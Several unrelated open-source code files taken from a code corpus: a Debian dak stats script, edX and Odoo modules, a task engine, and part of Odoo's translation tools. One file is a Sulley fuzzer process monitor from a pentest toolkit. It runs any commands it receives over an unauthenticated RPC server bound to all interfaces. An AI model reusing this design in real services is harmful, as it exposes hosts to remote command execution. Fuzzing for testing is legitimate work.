unlink(tmpfile)
else:
with open(logfile, 'r') as fd:
data = fd.read()
ts = parse_new_uploads(data)
if ts > latest_timestamp:
latest_timestamp = ts
ts = parse_actions(data, log)
if ts > latest_timestamp:
latest_timestamp = ts
stderr.write('.')
stderr.flush()
stderr.write('\n')
stderr.flush()
stats['timestamp'] = latest_timestamp
with open(yaml, 'w') as fd:
safe_dump(stats, fd)
################################################################################
def main ():
global Cnf
global users
Cnf = utils.get_conf()
Arguments = [('h',"help","Stats::Options::Help")]
for i in [ "help" ]:
if not Cnf.has_key("Stats::Options::%s" % (i)):
Cnf["Stats::Options::%s" % (i)] = ""
args = apt_pkg.parse_commandline(Cnf, Arguments, sys.argv)
Options = Cnf.subtree("Stats::Options")
if Options["Help"]:
usage()
if len(args) < 1:
utils.warn("dak stats requires a MODE argument")
usage(1)
elif len(args) > 1:
if args[0].lower() != "new":
utils.warn("dak stats accepts only one MODE argument")
usage(1)
elif args[0].lower() == "new":
utils.warn("new MODE requires an output file")
usage(1)
mode = args[0].lower()
if mode == "arch-space":
per_arch_space_use()
elif mode == "pkg-nums":
number_of_packages()
elif mode == "daily-install":
daily_install_stats()
elif mode == "new":
users = utils.get_users_from_ldap()
new_stats(Cnf["Dir::Log"], args[1])
else:
utils.warn("unknown mode '%s'" % (mode))
usage(1)
################################################################################
if __name__ == '__main__':
main()
| gpl-2.0 |
appsembler/edx-platform | lms/djangoapps/teams/tests/factories.py | 23 | 1230 | """Factories for testing the Teams API."""
from datetime import datetime
from uuid import uuid4
import factory
import pytz
from factory.django import DjangoModelFactory
from lms.djangoapps.teams.models import CourseTeam, CourseTeamMembership
LAST_ACTIVITY_AT = datetime(2015, 8, 15, 0, 0, 0, tzinfo=pytz.utc)
class CourseTeamFactory(DjangoModelFactory):
"""Factory for CourseTeams.
Note that team_id is not auto-generated from name when using the factory.
"""
class Meta(object):
model = CourseTeam
django_get_or_create = ('team_id',)
team_id = factory.Sequence('team-{0}'.format)
discussion_topic_id = factory.LazyAttribute(lambda a: uuid4().hex)
name = factory.Sequence("Awesome Team {0}".format)
description = "A simple description"
last_activity_at = LAST_ACTIVITY_AT
class CourseTeamMembershipFactory(DjangoModelFactory):
"""Factory for CourseTeamMemberships."""
class Meta(object):
model = CourseTeamMembership
last_activity_at = LAST_ACTIVITY_AT
@classmethod
def _create(cls, model_class, *args, **kwargs):
"""Create the team membership. """
obj = model_class(*args, **kwargs)
obj.save()
return obj
| agpl-3.0 |
sysadminmatmoz/OCB | addons/rating_project_issue/models/project_issue.py | 51 | 5818 | # -*- coding: utf-8 -*-
from openerp import api, fields, models
class ProjectIssue(models.Model):
_name = "project.issue"
_inherit = ['project.issue', 'rating.mixin']
@api.multi
def write(self, values):
if 'stage_id' in values and values.get('stage_id'):
template = self.env['project.task.type'].browse(values.get('stage_id')).rating_template_id
if template:
rated_partner_id = self.user_id.partner_id
partner_id = self.partner_id
if partner_id and rated_partner_id:
self.rating_send_request(template, partner_id, rated_partner_id)
return super(ProjectIssue, self).write(values)
class Project(models.Model):
_inherit = "project.project"
@api.multi
@api.depends('percentage_satisfaction_task', 'percentage_satisfaction_issue')
def _compute_percentage_satisfaction_project(self):
super(Project, self)._compute_percentage_satisfaction_project()
Rating = self.env['rating.rating']
Issue = self.env['project.issue']
for record in self.filtered(lambda record: record.use_tasks or record.use_issues):
if record.use_tasks or record.use_issues:
# built the domain according the project parameters (use tasks and/or issues)
res_models = []
domain = []
if record.use_tasks:
res_models.append('project.task')
domain += ['&', ('res_model', '=', 'project.task'), ('res_id', 'in', record.tasks.ids)]
if record.use_issues:
# TODO: if performance issue, compute the satisfaction with a custom request joining rating and task/issue.
issues = Issue.search([('project_id', '=', record.id)])
res_models.append('project.issue')
domain += ['&', ('res_model', '=', 'project.issue'), ('res_id', 'in', issues.ids)]
if len(res_models) == 2:
domain = ['|'] + domain
domain = ['&', ('rating', '>=', 0)] + domain
# get the number of rated tasks and issues with a read_group (more perfomant !)
grouped_data = Rating.read_group(domain, ['res_model'], ['res_model'])
# compute the number of each model and total number
res = dict.fromkeys(res_models, 0)
for data in grouped_data:
res[data['res_model']] += data['res_model_count']
nbr_rated_task = res.get('project.task', 0)
nbr_rated_issue = res.get('project.issue', 0)
nbr_project_rating = nbr_rated_issue + nbr_rated_task
# compute the weighted arithmetic average
ratio_task = float(nbr_rated_task) / float(nbr_project_rating) if nbr_project_rating else 0
ratio_issue = float(nbr_rated_issue) / float(nbr_project_rating) if nbr_project_rating else 0
record.percentage_satisfaction_project = round((ratio_task*record.percentage_satisfaction_task)+(ratio_issue*record.percentage_satisfaction_issue)) if nbr_project_rating else -1
else:
record.percentage_satisfaction_project = -1
@api.one
@api.depends('issue_ids.rating_ids.rating')
def _compute_percentage_satisfaction_issue(self):
project_issue = self.env['project.issue'].search([('project_id', '=', self.id)])
activity = project_issue.rating_get_grades()
self.percentage_satisfaction_issue = activity['great'] * 100 / sum(activity.values()) if sum(activity.values()) else -1
percentage_satisfaction_issue = fields.Integer(compute='_compute_percentage_satisfaction_issue', string='% Happy', store=True, default=-1)
@api.multi
def action_view_issue_rating(self):
""" return the action to see all the rating about the issues of the project """
action = self.env['ir.actions.act_window'].for_xml_id('rating', 'action_view_rating')
issues = self.env['project.issue'].search([('project_id', 'in', self.ids)])
return dict(action, domain=[('res_id', 'in', issues.ids), ('res_model', '=', 'project.issue')])
@api.multi
def action_view_all_rating(self):
action = super(Project, self).action_view_all_rating()
task_domain = action['domain'][1:] # remove the (rating != -1) condition
domain = []
if self.use_tasks: # add task domain, if neeeded
domain = ['&'] + task_domain
if self.use_issues: # add issue domain if needed
issues = self.env['project.issue'].search([('project_id', 'in', self.ids)])
domain = domain + ['&', ('res_id', 'in', issues.ids), ('res_model', '=', 'project.issue')]
if self.use_tasks and self.use_issues:
domain = ['|'] + domain
domain = [('rating', '!=', -1)] + domain # prepend the condition to avoid empty rating
return dict(action, domain=domain)
class Rating(models.Model):
_inherit = "rating.rating"
@api.model
def apply_rating(self, rate, res_model=None, res_id=None, token=None):
""" check if the auto_validation_kanban_state is activated. If so, apply the modification of the
kanban state according to the given rating.
"""
rating = super(Rating, self).apply_rating(rate, res_model, res_id, token)
if rating.res_model == 'project.issue':
issue = self.env[rating.res_model].sudo().browse(rating.res_id)
if issue.stage_id.auto_validation_kanban_state:
if rating.rating > 5:
issue.write({'kanban_state' : 'done'})
else:
issue.write({'kanban_state' : 'blocked'})
return rating
| agpl-3.0 |
firebitsbr/raspberry_pwn | src/pentest/voiper/sulley/nix_process_monitor.py | 8 | 9347 | import os
import sys
import getopt
import signal
import time
import threading
from sulley import pedrpc
'''
By nnp
http://www.unprotectedhex.com
This intended as a basic replacement for Sulley's process_monitor.py on *nix.
The below options are accepted. Crash details are limited to the signal that
caused the death and whatever operating system supported mechanism is in place (i.e
core dumps)
Replicated methods:
- alive
- log
- post_send
- pre_send
- start_target
- stop_target
- set_start_commands
- set_stop_commands
Limitations
- Cannot attach to an already running process
- Currently only accepts one start_command
- Limited 'crash binning'. Relies on the availability of core dumps. These
should be created in the same directory the process is ran from on Linux
and in the (hidden) /cores directory on OS X. On OS X you have to add
the option COREDUMPS=-YES- to /etc/hostconfig and then `ulimit -c
unlimited` as far as I know. A restart may be required. The file
specified by crash_bin will any other available details such as the test
that caused the crash and the signal received by the program
'''
USAGE = "USAGE: process_monitor.py"\
"\n [-c|--crash_bin] File to record crash info too" \
"\n [-P|--port PORT] TCP port to bind this agent too"\
"\n [-l|--log_level LEVEL] log level (default 1), increase for more verbosity" \
"\n [-t|--timeout timeout] amount of time to give an application to settle in after a restart"
ERR = lambda msg: sys.stderr.write("ERR> " + msg + "\n") or sys.exit(1)
class debugger_thread:
def __init__(self, start_command):
'''
This class isn't actually ran as a thread, only the start_monitoring
method is. It can spawn/stop a process, wait for it to exit and report on
the exit status/code.
'''
self.start_command = start_command
self.tokens = start_command.split(' ')
self.cmd_args = []
self.pid = None
self.exit_status = None
self.alive = False
def spawn_target(self):
print self.tokens
self.pid = os.spawnv(os.P_NOWAIT, self.tokens[0], self.tokens)
self.alive = True
def start_monitoring(self):
'''
self.exit_status = os.waitpid(self.pid, os.WNOHANG | os.WUNTRACED)
while self.exit_status == (0, 0):
self.exit_status = os.waitpid(self.pid, os.WNOHANG | os.WUNTRACED)
'''
self.exit_status = os.waitpid(self.pid, 0)
# [0] is the pid
self.exit_status = self.exit_status[1]
self.alive = False
def get_exit_status(self):
return self.exit_status
def stop_target(self):
os.kill(self.pid, signal.SIGKILL)
self.alive = False
def isAlive(self):
return self.alive
########################################################################################################################
class nix_process_monitor_pedrpc_server(pedrpc.server):
def __init__(self, host, port, crash_bin, log_level=1, timeout=5):
'''
@type host: String
@param host: Hostname or IP address
@type port: Integer
@param port: Port to bind server to
@type timeout: Integer
@param timeout: Time to give the application to settle in after a restart
'''
pedrpc.server.__init__(self, host, port)
self.crash_bin = crash_bin
self.log_level = log_level
self.dbg = None
self.timeout = timeout
self.log("Process Monitor PED-RPC server initialized:")
self.log("Listening on %s:%s" % (host, port))
self.log("awaiting requests...")
def alive (self):
'''
Returns True. Useful for PED-RPC clients who want to see if the PED-RPC connection is still alive.
'''
return True
def log (self, msg="", level=1):
'''
If the supplied message falls under the current log level, print the specified message to screen.
@type msg: String
@param msg: Message to log
'''
if self.log_level >= level:
print "[%s] %s" % (time.strftime("%I:%M.%S"), msg)
def post_send (self):
'''
This routine is called after the fuzzer transmits a test case and returns the status of the target.
@rtype: Boolean
@return: Return True if the target is still active, False otherwise.
'''
reason = ''
if not self.dbg.isAlive():
exit_status = self.dbg.get_exit_status()
rec_file = open(self.crash_bin, 'a')
if os.WCOREDUMP(exit_status):
reason = 'Segmentation fault'
elif os.WIFSTOPPED(exit_status):
reason = 'Stopped with signal ' + str(os.WTERMSIG(exit_status))
elif os.WIFSIGNALED(exit_status):
reason = 'Terminated with signal ' + str(os.WTERMSIG(exit_status))
elif os.WIFEXITED(exit_status):
reason = 'Exit with code - ' + str(os.WEXITSTATUS(exit_status))
else:
reason = 'Process died for unknown reason'
self.last_synopsis = '[%s] Crash : Test - %d Reason - %s\n' % (time.strftime("%I:%M.%S"), self.test_number, reason)
rec_file.write(self.last_synopsis)
rec_file.close()
return (self.dbg.isAlive(), reason)
def pre_send (self, test_number):
'''
This routine is called before the fuzzer transmits a test case and ensure the debugger thread is operational. In the case
of the *nix process monitor and operational debugger thread == a running target program
@type test_number: Integer
@param test_number: Test number to retrieve PCAP for.
'''
if self.dbg == None:
self.start_target()
self.log("pre_send(%d)" % test_number, 10)
self.test_number = test_number
if not self.dbg or not self.dbg.isAlive():
self.start_target()
def start_target (self):
'''
Start up the target process by issuing the commands in self.start_commands.
'''
self.log("starting target process")
self.dbg = debugger_thread(self.start_commands[0])
self.dbg.spawn_target()
# prevent blocking by spawning off another thread to waitpid
threading.Thread(target=self.dbg.start_monitoring).start()
self.log("done. target up and running, giving it %d seconds to settle in." % self.timeout)
time.sleep(self.timeout)
def stop_target (self):
'''
Kill the current debugger thread and stop the target process by issuing the commands in self.stop_commands.
'''
# give the debugger thread a chance to exit.
time.sleep(1)
self.log("stopping target process")
for command in self.stop_commands:
if command == "TERMINATE_PID":
self.dbg.stop_target()
else:
os.system(command)
## time.sleep(2)
## # just in case
## try:
## self.dbg.stop_target()
## except:
## pass
def set_start_commands (self, start_commands):
'''
We expect start_commands to be a list with one element for example
['/usr/bin/program arg1 arg2 arg3']
'''
if len(start_commands) > 1:
self.log("This process monitor does not accept > 1 start command")
return
self.log("updating start commands to: %s" % start_commands)
self.start_commands = start_commands
def set_stop_commands (self, stop_commands):
self.log("updating stop commands to: %s" % stop_commands)
self.stop_commands = stop_commands
def set_proc_name (self, proc_name):
self.log("updating target process name to '%s'" % proc_name)
self.proc_name = proc_name
def get_crash_synopsis (self):
'''
Return the last recorded crash synopsis.
@rtype: String
@return: Synopsis of last recorded crash.
'''
return self.last_synopsis
########################################################################################################################
if __name__ == "__main__":
# parse command line options.
try:
opts, args = getopt.getopt(sys.argv[1:], "c:P:l:t:", ["crash_bin=","port=","log_level=", "timeout="])
except getopt.GetoptError:
ERR(USAGE)
log_level = 1
PORT = None
crash_bin = None
timeout = 5
for opt, arg in opts:
if opt in ("-c", "--crash_bin"): crash_bin = arg
if opt in ("-P", "--port"): PORT = int(arg)
if opt in ("-l", "--log_level"): log_level = int(arg)
if opt in ("-t", "--timeout"): timeout = int(arg)
if crash_bin == None: ERR(USAGE)
if PORT == None:
PORT = 26002
# spawn the PED-RPC servlet.
servlet = nix_process_monitor_pedrpc_server("0.0.0.0", PORT, crash_bin, log_level, timeout)
servlet.serve_forever()
| gpl-3.0 |
shakhat/act | act/engine/core.py | 1 | 7144 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import random
import re
import time
from oslo_log import log as logging
from oslo_utils import timeutils
import rq
from act.engine import consts
from act.engine import item as item_pkg
from act.engine import metrics
from act.engine import registry
from act.engine import utils
from act.engine import world as world_pkg
LOG = logging.getLogger(__name__)
Task = collections.namedtuple('Task', ['id', 'action', 'items'])
NoOpTask = Task(id=0, action=None, items=None)
def produce_task(world, actions):
available_action_items = {} # action -> (items)
for action in actions:
item_types = action.get_depends_on()
world_items = world.filter_items(item_types)
filtered_items = list(action.filter_items(world_items))
if not filtered_items:
continue
# LOG.debug('Available action: %s, item-types: %s, filtered_items: %s',
# action, item_types, filtered_items)
# check that filtered_items contain items of *all* item_types
filtered_item_types = set(i.item_type for i in filtered_items)
if item_types and filtered_item_types != item_types:
continue
available_action_items[action] = filtered_items
if available_action_items:
available_actions = list(available_action_items.keys())
chosen_action = utils.weighted_random_choice(available_actions)
available_items = available_action_items[chosen_action]
# pick one random item per type
items_per_type = collections.defaultdict(list)
for item in available_items:
items_per_type[item.item_type].append(item)
chosen_items = [random.choice(v) for v in items_per_type.values()]
chosen_action.reserve_items(chosen_items)
task = Task(id=utils.make_id(), action=chosen_action,
items=chosen_items)
LOG.info('Produced task: %s', task)
return task
else:
LOG.debug('No actions available')
return None
def handle_operation(op, world):
# handles a specific operation on the world
LOG.info('Handle: %s', op)
op.do(world)
def do_action(task):
# does real action inside worker processes
LOG.info('Executing action %s', task)
action = task.action
operation = action.do_action(items=task.items, task_id=task.id)
LOG.info('Operation %s', operation)
return operation
def apply_action_filter(action_filter):
if not action_filter:
for a in registry.get_actions():
yield a
else:
for action in registry.get_actions():
if re.match(action_filter, str(action)):
yield action
def apply_limits_filter(limits, actions, actions_counter):
for action in actions:
if str(action) in limits:
limit = limits[str(action)]
if actions_counter[str(action)] < limit:
yield action
else:
yield action
def process(scenario, interval):
# the entry-point to engine
registry.init()
metrics.clear()
# initialize the world
default_items = [item_pkg.Item('root')]
world = world_pkg.World()
for item in default_items:
world.put(item)
# global section
globals = scenario.get('global') or {}
global_limits = globals['limits'] if 'limits' in globals else {}
for action in registry.get_actions():
limit = action.get_limit()
if limit:
global_limits[str(action)] = limit
# play!
play = scenario['play']
LOG.info('Playing scenario "%s"', scenario['title'])
# add tear down
play.append(dict(concurrency=0, duration=1000, title='tear down'))
task_results = []
task_queue = rq.Queue(consts.TASK_QUEUE_NAME)
failed_queue = rq.Queue(consts.FAILURE_QUEUE_NAME)
failed_queue.empty()
metrics.set_metric(metrics.METRIC_TYPE_SUMMARY, 'failures', 0,
mood=metrics.MOOD_HAPPY)
failures = 0
counter = 0
actions_counter = collections.defaultdict(int)
for idx, stage in enumerate(play):
title = stage.get('title') or ('stage #%s' % idx)
duration = stage['duration']
concurrency = stage['concurrency']
LOG.info('Playing stage "%s" duration: %s, concurrency: %s',
title, duration, concurrency)
limits = stage.get('limits') or {}
limits.update(global_limits)
watch = timeutils.StopWatch(duration=duration)
watch.start()
while not watch.expired():
pending = []
for task_result in task_results:
operation = task_result.return_value
if operation is None:
pending.append(task_result)
else:
handle_operation(operation, world)
counter += 1
metrics.set_metric(metrics.METRIC_TYPE_SUMMARY,
'operation', counter)
addition = concurrency - len(pending)
if addition > 0: # need to add more tasks
for i in range(addition):
actions = apply_action_filter(stage.get('filter'))
actions = apply_limits_filter(limits, actions,
actions_counter)
next_task = produce_task(world, actions)
if not next_task:
break # no more actions possible
pending.append(task_queue.enqueue(do_action, next_task))
actions_counter[str(next_task.action)] += 1
task_results = pending
if len(failed_queue) > failures:
failures = len(failed_queue)
metrics.set_metric(metrics.METRIC_TYPE_SUMMARY, 'failures',
failures, mood=metrics.MOOD_SAD)
metrics.set_metric(metrics.METRIC_TYPE_SUMMARY, 'backlog',
len(task_results))
for action, counter in actions_counter.items():
metrics.set_metric(metrics.METRIC_TYPE_ACTIONS, action,
counter)
for item_type, counter in world.get_counters().items():
metrics.set_metric(metrics.METRIC_TYPE_OBJECTS, item_type,
counter)
if len(task_results) == 0: # no existing tasks and no to add
break # tear down finished
time.sleep(interval)
LOG.info('World: %s', world)
| apache-2.0 |
hubsaysnuaa/odoo | openerp/tools/translate.py | 27 | 45371 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import codecs
import csv
import fnmatch
import inspect
import locale
import os
import openerp.sql_db as sql_db
import re
import logging
import tarfile
import tempfile
import threading
from babel.messages import extract
from collections import defaultdict
from datetime import datetime
from lxml import etree
from os.path import join
import config
import misc
from misc import SKIPPED_ELEMENT_TYPES
import osutil
import openerp
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
# used to notify web client that these translations should be loaded in the UI
WEB_TRANSLATION_COMMENT = "openerp-web"
SKIPPED_ELEMENTS = ('script', 'style')
_LOCALE2WIN32 = {
'af_ZA': 'Afrikaans_South Africa',
'sq_AL': 'Albanian_Albania',
'ar_SA': 'Arabic_Saudi Arabia',
'eu_ES': 'Basque_Spain',
'be_BY': 'Belarusian_Belarus',
'bs_BA': 'Bosnian_Bosnia and Herzegovina',
'bg_BG': 'Bulgarian_Bulgaria',
'ca_ES': 'Catalan_Spain',
'hr_HR': 'Croatian_Croatia',
'zh_CN': 'Chinese_China',
'zh_TW': 'Chinese_Taiwan',
'cs_CZ': 'Czech_Czech Republic',
'da_DK': 'Danish_Denmark',
'nl_NL': 'Dutch_Netherlands',
'et_EE': 'Estonian_Estonia',
'fa_IR': 'Farsi_Iran',
'ph_PH': 'Filipino_Philippines',
'fi_FI': 'Finnish_Finland',
'fr_FR': 'French_France',
'fr_BE': 'French_France',
'fr_CH': 'French_France',
'fr_CA': 'French_France',
'ga': 'Scottish Gaelic',
'gl_ES': 'Galician_Spain',
'ka_GE': 'Georgian_Georgia',
'de_DE': 'German_Germany',
'el_GR': 'Greek_Greece',
'gu': 'Gujarati_India',
'he_IL': 'Hebrew_Israel',
'hi_IN': 'Hindi',
'hu': 'Hungarian_Hungary',
'is_IS': 'Icelandic_Iceland',
'id_ID': 'Indonesian_indonesia',
'it_IT': 'Italian_Italy',
'ja_JP': 'Japanese_Japan',
'kn_IN': 'Kannada',
'km_KH': 'Khmer',
'ko_KR': 'Korean_Korea',
'lo_LA': 'Lao_Laos',
'lt_LT': 'Lithuanian_Lithuania',
'lat': 'Latvian_Latvia',
'ml_IN': 'Malayalam_India',
'mi_NZ': 'Maori',
'mn': 'Cyrillic_Mongolian',
'no_NO': 'Norwegian_Norway',
'nn_NO': 'Norwegian-Nynorsk_Norway',
'pl': 'Polish_Poland',
'pt_PT': 'Portuguese_Portugal',
'pt_BR': 'Portuguese_Brazil',
'ro_RO': 'Romanian_Romania',
'ru_RU': 'Russian_Russia',
'sr_CS': 'Serbian (Cyrillic)_Serbia and Montenegro',
'sk_SK': 'Slovak_Slovakia',
'sl_SI': 'Slovenian_Slovenia',
#should find more specific locales for spanish countries,
#but better than nothing
'es_AR': 'Spanish_Spain',
'es_BO': 'Spanish_Spain',
'es_CL': 'Spanish_Spain',
'es_CO': 'Spanish_Spain',
'es_CR': 'Spanish_Spain',
'es_DO': 'Spanish_Spain',
'es_EC': 'Spanish_Spain',
'es_ES': 'Spanish_Spain',
'es_GT': 'Spanish_Spain',
'es_HN': 'Spanish_Spain',
'es_MX': 'Spanish_Spain',
'es_NI': 'Spanish_Spain',
'es_PA': 'Spanish_Spain',
'es_PE': 'Spanish_Spain',
'es_PR': 'Spanish_Spain',
'es_PY': 'Spanish_Spain',
'es_SV': 'Spanish_Spain',
'es_UY': 'Spanish_Spain',
'es_VE': 'Spanish_Spain',
'sv_SE': 'Swedish_Sweden',
'ta_IN': 'English_Australia',
'th_TH': 'Thai_Thailand',
'tr_TR': 'Turkish_Turkey',
'uk_UA': 'Ukrainian_Ukraine',
'vi_VN': 'Vietnamese_Viet Nam',
'tlh_TLH': 'Klingon',
}
# These are not all english small words, just those that could potentially be isolated within views
ENGLISH_SMALL_WORDS = set("as at by do go if in me no of ok on or to up us we".split())
class UNIX_LINE_TERMINATOR(csv.excel):
lineterminator = '\n'
csv.register_dialect("UNIX", UNIX_LINE_TERMINATOR)
#
# Warning: better use self.pool.get('ir.translation')._get_source if you can
#
def translate(cr, name, source_type, lang, source=None):
if source and name:
cr.execute('select value from ir_translation where lang=%s and type=%s and name=%s and src=%s', (lang, source_type, str(name), source))
elif name:
cr.execute('select value from ir_translation where lang=%s and type=%s and name=%s', (lang, source_type, str(name)))
elif source:
cr.execute('select value from ir_translation where lang=%s and type=%s and src=%s', (lang, source_type, source))
res_trans = cr.fetchone()
res = res_trans and res_trans[0] or False
return res
class GettextAlias(object):
def _get_db(self):
# find current DB based on thread/worker db name (see netsvc)
db_name = getattr(threading.currentThread(), 'dbname', None)
if db_name:
return sql_db.db_connect(db_name)
def _get_cr(self, frame, allow_create=True):
# try, in order: cr, cursor, self.env.cr, self.cr,
# request.env.cr
if 'cr' in frame.f_locals:
return frame.f_locals['cr'], False
if 'cursor' in frame.f_locals:
return frame.f_locals['cursor'], False
s = frame.f_locals.get('self')
if hasattr(s, 'env'):
return s.env.cr, False
if hasattr(s, 'cr'):
return s.cr, False
try:
from openerp.http import request
return request.env.cr, False
except RuntimeError:
pass
if allow_create:
# create a new cursor
db = self._get_db()
if db is not None:
return db.cursor(), True
return None, False
def _get_uid(self, frame):
# try, in order: uid, user, self.env.uid
if 'uid' in frame.f_locals:
return frame.f_locals['uid']
if 'user' in frame.f_locals:
return int(frame.f_locals['user']) # user may be a record
s = frame.f_locals.get('self')
return s.env.uid
def _get_lang(self, frame):
# try, in order: context.get('lang'), kwargs['context'].get('lang'),
# self.env.lang, self.localcontext.get('lang'), request.env.lang
lang = None
if frame.f_locals.get('context'):
lang = frame.f_locals['context'].get('lang')
if not lang:
kwargs = frame.f_locals.get('kwargs', {})
if kwargs.get('context'):
lang = kwargs['context'].get('lang')
if not lang:
s = frame.f_locals.get('self')
if hasattr(s, 'env'):
lang = s.env.lang
if not lang:
if hasattr(s, 'localcontext'):
lang = s.localcontext.get('lang')
if not lang:
try:
from openerp.http import request
lang = request.env.lang
except RuntimeError:
pass
if not lang:
# Last resort: attempt to guess the language of the user
# Pitfall: some operations are performed in sudo mode, and we
# don't know the originial uid, so the language may
# be wrong when the admin language differs.
pool = getattr(s, 'pool', None)
(cr, dummy) = self._get_cr(frame, allow_create=False)
uid = self._get_uid(frame)
if pool and cr and uid:
lang = pool['res.users'].context_get(cr, uid)['lang']
return lang
def __call__(self, source):
res = source
cr = None
is_new_cr = False
try:
frame = inspect.currentframe()
if frame is None:
return source
frame = frame.f_back
if not frame:
return source
lang = self._get_lang(frame)
if lang:
cr, is_new_cr = self._get_cr(frame)
if cr:
# Try to use ir.translation to benefit from global cache if possible
registry = openerp.registry(cr.dbname)
res = registry['ir.translation']._get_source(cr, SUPERUSER_ID, None, ('code','sql_constraint'), lang, source)
else:
_logger.debug('no context cursor detected, skipping translation for "%r"', source)
else:
_logger.debug('no translation language detected, skipping translation for "%r" ', source)
except Exception:
_logger.debug('translation went wrong for "%r", skipped', source)
# if so, double-check the root/base translations filenames
finally:
if cr and is_new_cr:
cr.close()
return res
_ = GettextAlias()
def quote(s):
"""Returns quoted PO term string, with special PO characters escaped"""
assert r"\n" not in s, "Translation terms may not include escaped newlines ('\\n'), please use only literal newlines! (in '%s')" % s
return '"%s"' % s.replace('\\','\\\\') \
.replace('"','\\"') \
.replace('\n', '\\n"\n"')
re_escaped_char = re.compile(r"(\\.)")
re_escaped_replacements = {'n': '\n', }
def _sub_replacement(match_obj):
return re_escaped_replacements.get(match_obj.group(1)[1], match_obj.group(1)[1])
def unquote(str):
"""Returns unquoted PO term string, with special PO characters unescaped"""
return re_escaped_char.sub(_sub_replacement, str[1:-1])
# class to handle po files
class TinyPoFile(object):
def __init__(self, buffer):
self.buffer = buffer
def warn(self, msg, *args):
_logger.warning(msg, *args)
def __iter__(self):
self.buffer.seek(0)
self.lines = self._get_lines()
self.lines_count = len(self.lines)
self.first = True
self.extra_lines= []
return self
def _get_lines(self):
lines = self.buffer.readlines()
# remove the BOM (Byte Order Mark):
if len(lines):
lines[0] = unicode(lines[0], 'utf8').lstrip(unicode( codecs.BOM_UTF8, "utf8"))
lines.append('') # ensure that the file ends with at least an empty line
return lines
def cur_line(self):
return self.lines_count - len(self.lines)
def next(self):
trans_type = name = res_id = source = trad = None
if self.extra_lines:
trans_type, name, res_id, source, trad, comments = self.extra_lines.pop(0)
if not res_id:
res_id = '0'
else:
comments = []
targets = []
line = None
fuzzy = False
while not line:
if 0 == len(self.lines):
raise StopIteration()
line = self.lines.pop(0).strip()
while line.startswith('#'):
if line.startswith('#~ '):
break
if line.startswith('#.'):
line = line[2:].strip()
if not line.startswith('module:'):
comments.append(line)
elif line.startswith('#:'):
# Process the `reference` comments. Each line can specify
# multiple targets (e.g. model, view, code, selection,
# ...). For each target, we will return an additional
# entry.
for lpart in line[2:].strip().split(' '):
trans_info = lpart.strip().split(':',2)
if trans_info and len(trans_info) == 2:
# looks like the translation trans_type is missing, which is not
# unexpected because it is not a GetText standard. Default: 'code'
trans_info[:0] = ['code']
if trans_info and len(trans_info) == 3:
# this is a ref line holding the destination info (model, field, record)
targets.append(trans_info)
elif line.startswith('#,') and (line[2:].strip() == 'fuzzy'):
fuzzy = True
line = self.lines.pop(0).strip()
if not self.lines:
raise StopIteration()
while not line:
# allow empty lines between comments and msgid
line = self.lines.pop(0).strip()
if line.startswith('#~ '):
while line.startswith('#~ ') or not line.strip():
if 0 == len(self.lines):
raise StopIteration()
line = self.lines.pop(0)
# This has been a deprecated entry, don't return anything
return self.next()
if not line.startswith('msgid'):
raise Exception("malformed file: bad line: %s" % line)
source = unquote(line[6:])
line = self.lines.pop(0).strip()
if not source and self.first:
self.first = False
# if the source is "" and it's the first msgid, it's the special
# msgstr with the informations about the traduction and the
# traductor; we skip it
self.extra_lines = []
while line:
line = self.lines.pop(0).strip()
return self.next()
while not line.startswith('msgstr'):
if not line:
raise Exception('malformed file at %d'% self.cur_line())
source += unquote(line)
line = self.lines.pop(0).strip()
trad = unquote(line[7:])
line = self.lines.pop(0).strip()
while line:
trad += unquote(line)
line = self.lines.pop(0).strip()
if targets and not fuzzy:
# Use the first target for the current entry (returned at the
# end of this next() call), and keep the others to generate
# additional entries (returned the next next() calls).
trans_type, name, res_id = targets.pop(0)
for t, n, r in targets:
if t == trans_type == 'code': continue
self.extra_lines.append((t, n, r, source, trad, comments))
if name is None:
if not fuzzy:
self.warn('Missing "#:" formated comment at line %d for the following source:\n\t%s',
self.cur_line(), source[:30])
return self.next()
return trans_type, name, res_id, source, trad, '\n'.join(comments)
def write_infos(self, modules):
import openerp.release as release
self.buffer.write("# Translation of %(project)s.\n" \
"# This file contains the translation of the following modules:\n" \
"%(modules)s" \
"#\n" \
"msgid \"\"\n" \
"msgstr \"\"\n" \
'''"Project-Id-Version: %(project)s %(version)s\\n"\n''' \
'''"Report-Msgid-Bugs-To: \\n"\n''' \
'''"POT-Creation-Date: %(now)s\\n"\n''' \
'''"PO-Revision-Date: %(now)s\\n"\n''' \
'''"Last-Translator: <>\\n"\n''' \
'''"Language-Team: \\n"\n''' \
'''"MIME-Version: 1.0\\n"\n''' \
'''"Content-Type: text/plain; charset=UTF-8\\n"\n''' \
'''"Content-Transfer-Encoding: \\n"\n''' \
'''"Plural-Forms: \\n"\n''' \
"\n"
% { 'project': release.description,
'version': release.version,
'modules': reduce(lambda s, m: s + "#\t* %s\n" % m, modules, ""),
'now': datetime.utcnow().strftime('%Y-%m-%d %H:%M')+"+0000",
}
)
def write(self, modules, tnrs, source, trad, comments=None):
plurial = len(modules) > 1 and 's' or ''
self.buffer.write("#. module%s: %s\n" % (plurial, ', '.join(modules)))
if comments:
self.buffer.write(''.join(('#. %s\n' % c for c in comments)))
code = False
for typy, name, res_id in tnrs:
self.buffer.write("#: %s:%s:%s\n" % (typy, name, res_id))
if typy == 'code':
code = True
if code:
# only strings in python code are python formated
self.buffer.write("#, python-format\n")
if not isinstance(trad, unicode):
trad = unicode(trad, 'utf8')
if not isinstance(source, unicode):
